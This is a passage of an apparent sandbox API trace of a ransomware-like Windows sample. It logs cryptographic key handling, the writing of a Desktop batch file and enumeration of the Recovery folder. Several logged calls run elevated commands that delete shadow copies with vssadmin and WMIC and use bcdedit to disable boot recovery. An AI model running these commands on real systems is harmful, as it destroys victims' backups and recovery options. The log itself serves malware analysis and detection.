HALPmcxz\\Desktop\\ecorp.bat", lpFilePart=0x0) returned 0x2f [0091.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x16e290) returned 1 [0091.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x43c [0091.358] GetFileType (hFile=0x43c) returned 0x1 [0091.358] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x16e200) returned 1 [0091.358] GetFileType (hFile=0x43c) returned 0x1 [0091.358] WriteFile (in: hFile=0x43c, lpBuffer=0x2318ee8*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x16e3d8, lpOverlapped=0x0 | out: lpBuffer=0x2318ee8*, lpNumberOfBytesWritten=0x16e3d8*=0x51, lpOverlapped=0x0) returned 1 [0091.359] CloseHandle (hObject=0x43c) returned 1 [0091.360] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x105, lpBuffer=0x16de60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x0) returned 0x25 [0091.360] LocalAlloc (uFlags=0x0, uBytes=0x60) returned 0x1a6269f0 [0091.407] LocalFree (hMem=0x1a6269f0) returned 0x0 [0091.407] CoGetContextToken (in: pToken=0x16f530 | out: pToken=0x16f530) returned 0x0 [0091.407] CObjectContext::QueryInterface () returned 0x0 [0091.407] CObjectContext::GetCurrentThreadType () returned 0x0 [0091.407] Release () returned 0x0 [0091.408] CoGetContextToken (in: pToken=0x16f040 | out: pToken=0x16f040) returned 0x0 [0091.408] CObjectContext::QueryInterface () returned 0x0 [0091.408] CObjectContext::GetCurrentThreadType () returned 0x0 [0091.408] Release () returned 0x0 [0091.409] CoGetContextToken (in: pToken=0x16f040 | out: pToken=0x16f040) returned 0x0 [0091.409] CObjectContext::QueryInterface () returned 0x0 [0091.409] CObjectContext::GetCurrentThreadType () returned 0x0 [0091.409] Release () returned 0x0 [0091.424] CoGetContextToken (in: pToken=0x16f040 | out: pToken=0x16f040) returned 0x0 [0091.424] CObjectContext::QueryInterface () returned 0x0 [0091.424] CObjectContext::GetCurrentThreadType () returned 0x0 [0091.424] Release () returned 0x0 [0091.425] CoGetContextToken (in: pToken=0x16f050 | out: pToken=0x16f050) returned 0x0 [0091.425] CObjectContext::QueryInterface () returned 0x0 [0091.425] CObjectContext::GetCurrentThreadType () returned 0x0 [0091.425] Release () returned 0x0 [0091.425] CoUninitialize () Thread: id = 2 os_tid = 0xa50 Thread: id = 3 os_tid = 0xa58 [0033.079] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0070.659] CryptDestroyKey (hKey=0x1a5d32b0) returned 1 [0070.659] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0070.659] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0070.659] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0070.659] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0070.659] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0070.659] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0070.660] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0070.660] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0070.660] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0070.660] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0070.660] CloseHandle (hObject=0x3c8) returned 1 [0070.661] CloseHandle (hObject=0x388) returned 1 [0070.661] CloseHandle (hObject=0x370) returned 1 [0070.661] CloseHandle (hObject=0x354) returned 1 [0070.662] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0070.662] CloseHandle (hObject=0x1c0) returned 1 [0073.396] CryptDestroyKey (hKey=0x1a5d32b0) returned 1 [0073.396] CryptReleaseContext (hProv=0x1a5b7f10, dwFlags=0x0) returned 1 [0073.396] CryptReleaseContext (hProv=0x1a5b7f10, dwFlags=0x0) returned 1 [0073.397] CryptDestroyKey (hKey=0x1a626c90) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7610, dwFlags=0x0) returned 1 [0073.397] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7b10, dwFlags=0x0) returned 1 [0073.397] CryptDestroyKey (hKey=0x1a626d00) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7810, dwFlags=0x0) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7810, dwFlags=0x0) returned 1 [0073.397] CryptReleaseContext (hProv=0x1a5b7b10, dwFlags=0x0) returned 1 [0073.398] CryptDestroyKey (hKey=0x1a626f30) returned 1 [0073.398] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0073.398] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0073.398] CryptDestroyKey (hKey=0x1a626d70) returned 1 [0073.398] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0073.398] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0073.398] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0073.399] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0073.399] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0073.399] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0073.399] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0073.399] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0073.400] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0073.400] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0073.400] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0073.400] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0073.400] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0073.400] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0073.401] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0073.401] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0073.401] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0073.401] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0073.401] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0073.402] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.089] CryptDestroyKey (hKey=0x1a626d00) returned 1 [0075.089] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.089] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0075.089] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.090] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.090] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0075.090] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.090] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.090] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0075.090] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.090] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.091] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0075.091] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.091] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.091] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.091] CryptDestroyKey (hKey=0x1a626f30) returned 1 [0075.091] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.092] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.092] CryptDestroyKey (hKey=0x1a626d70) returned 1 [0075.092] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.092] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.092] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0075.092] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.092] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.093] CryptDestroyKey (hKey=0x4ce9f0) returned 1 [0075.093] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.094] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.829] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.829] CryptDestroyKey (hKey=0x1a626f30) returned 1 [0075.829] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.830] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0075.830] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0075.830] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.830] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0075.830] CryptDestroyKey (hKey=0x1a626d00) returned 1 [0075.830] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.830] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0075.831] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0075.831] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.831] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0075.832] CryptDestroyKey (hKey=0x1a626d70) returned 1 [0075.832] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.832] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0075.832] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0075.832] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0075.833] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0075.833] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0075.833] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0075.833] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.374] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0076.374] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0076.375] CryptReleaseContext (hProv=0x1a5b7c10, dwFlags=0x0) returned 1 [0076.375] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0076.375] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0076.375] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0076.376] CryptDestroyKey (hKey=0x1a626c90) returned 1 [0076.376] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.376] CryptDestroyKey (hKey=0x1a626d70) returned 1 [0076.376] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.376] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0076.377] CryptDestroyKey (hKey=0x1a626f30) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0076.377] CryptDestroyKey (hKey=0x1a626d00) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0076.377] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.377] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0076.378] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0076.378] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.378] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.378] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0076.378] CryptDestroyKey (hKey=0x1a626ec0) returned 1 [0076.378] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0076.379] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0091.408] EtwEventUnregister (RegHandle=0x2200010001) returned 0x0 [0091.408] EtwEventUnregister (RegHandle=0x2300010001) returned 0x0 [0091.413] CloseHandle (hObject=0x434) returned 1 [0091.414] CloseHandle (hObject=0x488) returned 1 [0091.414] CryptDestroyKey (hKey=0x1a626c90) returned 1 [0091.415] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0091.415] CryptReleaseContext (hProv=0x1a5b7710, dwFlags=0x0) returned 1 [0091.415] CloseHandle (hObject=0x46c) returned 1 [0091.416] CryptDestroyKey (hKey=0x1a626d70) returned 1 [0091.416] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0091.416] CryptReleaseContext (hProv=0x1a5b7d10, dwFlags=0x0) returned 1 [0091.417] CryptDestroyKey (hKey=0x1a626b40) returned 1 [0091.417] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0091.417] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0091.418] CryptDestroyKey (hKey=0x1a626f30) returned 1 [0091.418] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0091.418] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0091.419] CryptDestroyKey (hKey=0x1a626d00) returned 1 [0091.419] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0091.420] CryptReleaseContext (hProv=0x1a5b7a10, dwFlags=0x0) returned 1 [0091.421] CloseHandle (hObject=0x450) returned 1 [0091.421] CryptDestroyKey (hKey=0x1a626c20) returned 1 [0091.421] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0091.421] CryptReleaseContext (hProv=0x1a5b6e10, dwFlags=0x0) returned 1 [0091.422] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0091.422] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0091.423] CryptReleaseContext (hProv=0x1a5b7910, dwFlags=0x0) returned 1 [0091.423] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0091.423] CloseHandle (hObject=0x1bc) returned 1 [0091.425] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 4 os_tid = 0xa5c Thread: id = 5 os_tid = 0xa60 Thread: id = 6 os_tid = 0xaec [0034.598] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0035.817] ShellExecuteExW (in: pExecInfo=0x211de90*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C vssadmin.exe delete shadows /all /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x211de90*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C vssadmin.exe delete shadows /all /Quiet", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x354)) returned 1 [0040.543] CoGetContextToken (in: pToken=0x1af8f760 | out: pToken=0x1af8f760) returned 0x0 [0040.545] CoUninitialize () Thread: id = 7 os_tid = 0xaf0 Thread: id = 8 os_tid = 0xaf4 Thread: id = 10 os_tid = 0xb08 [0040.597] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0040.600] ShellExecuteExW (in: pExecInfo=0x211e408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C WMIC.exe shadowcopy delete ", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x211e408*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C WMIC.exe shadowcopy delete ", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x370)) returned 1 [0040.621] CoGetContextToken (in: pToken=0x1afff5d0 | out: pToken=0x1afff5d0) returned 0x0 [0040.621] CoUninitialize () Thread: id = 12 os_tid = 0xb20 [0040.661] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0040.719] ShellExecuteExW (in: pExecInfo=0x211e8c0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C Bcdedit.exe /set {default} recoveryenabled no", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x211e8c0*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C Bcdedit.exe /set {default} recoveryenabled no", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x388)) returned 1 [0040.745] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd8c0*=0x358, lpdwindex=0x1afff3b4 | out: lpdwindex=0x1afff3b4) returned 0x0 [0041.172] CoGetContextToken (in: pToken=0x1afff690 | out: pToken=0x1afff690) returned 0x0 [0041.172] CoUninitialize () Thread: id = 17 os_tid = 0xb58 Thread: id = 21 os_tid = 0xb70 [0041.557] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0041.558] ShellExecuteExW (in: pExecInfo=0x211eda8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x211eda8*(cbSize=0x70, fMask=0x540, hwnd=0x0, lpVerb="runas", lpFile="cmd.exe", lpParameters="/C Bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3c8)) returned 1 [0041.578] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1a5bd910*=0x3a4, lpdwindex=0x1af6f644 | out: lpdwindex=0x1af6f644) returned 0x0 [0041.667] CoGetContextToken (in: pToken=0x1af6f920 | out: pToken=0x1af6f920) returned 0x0 [0041.667] CoUninitialize () Thread: id = 114 os_tid = 0x408 [0051.970] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0051.971] CoGetContextToken (in: pToken=0x1bf5fa20 | out: pToken=0x1bf5fa20) returned 0x0 [0051.971] CObjectContext::QueryInterface () returned 0x0 [0051.971] CObjectContext::GetCurrentThreadType () returned 0x0 [0051.971] Release () returned 0x0 [0051.971] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0051.971] CoUninitialize () [0051.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ed80) returned 1 [0051.998] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x1bf5e870, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0051.998] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0051.998] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x1bf5ea20 | out: lpFindFileData=0x1bf5ea20*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.005] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.005] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0052.005] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 0 [0052.005] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ecd0) returned 1 [0052.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec90) returned 1 [0052.005] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5ed80) returned 1 [0052.005] GetFullPathNameW (in: lpFileName="C:\\Recovery", nBufferLength=0x105, lpBuffer=0x1bf5e870, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery", lpFilePart=0x0) returned 0xb [0052.005] GetFullPathNameW (in: lpFileName="C:\\Recovery\\", nBufferLength=0x105, lpBuffer=0x1bf5e810, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\", lpFilePart=0x0) returned 0xc [0052.005] FindFirstFileW (in: lpFileName="C:\\Recovery\\*", lpFindFileData=0x1bf5ea20 | out: lpFindFileData=0x1bf5ea20*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.006] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27cc8060, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27cc8060, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.006] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="e9e23962-4a25-11e7-88e8-91fb2ec43f0b", cAlternateFileName="E9E239~1")) returned 1 [0052.006] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5ea70 | out: lpFindFileData=0x1bf5ea70*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0052.006] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ecd0) returned 1 [0052.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5ec90) returned 1 [0052.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e480) returned 1 [0052.006] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", nBufferLength=0x105, lpBuffer=0x1bf5df70, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b", lpFilePart=0x0) returned 0x30 [0052.006] GetFullPathNameW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\", lpFilePart=0x0) returned 0x31 [0052.007] FindFirstFileW (in: lpFileName="C:\\Recovery\\e9e23962-4a25-11e7-88e8-91fb2ec43f0b\\*", lpFindFileData=0x1bf5e120 | out: lpFindFileData=0x1bf5e120*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x27c09980, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27c2fae0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27c2fae0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", 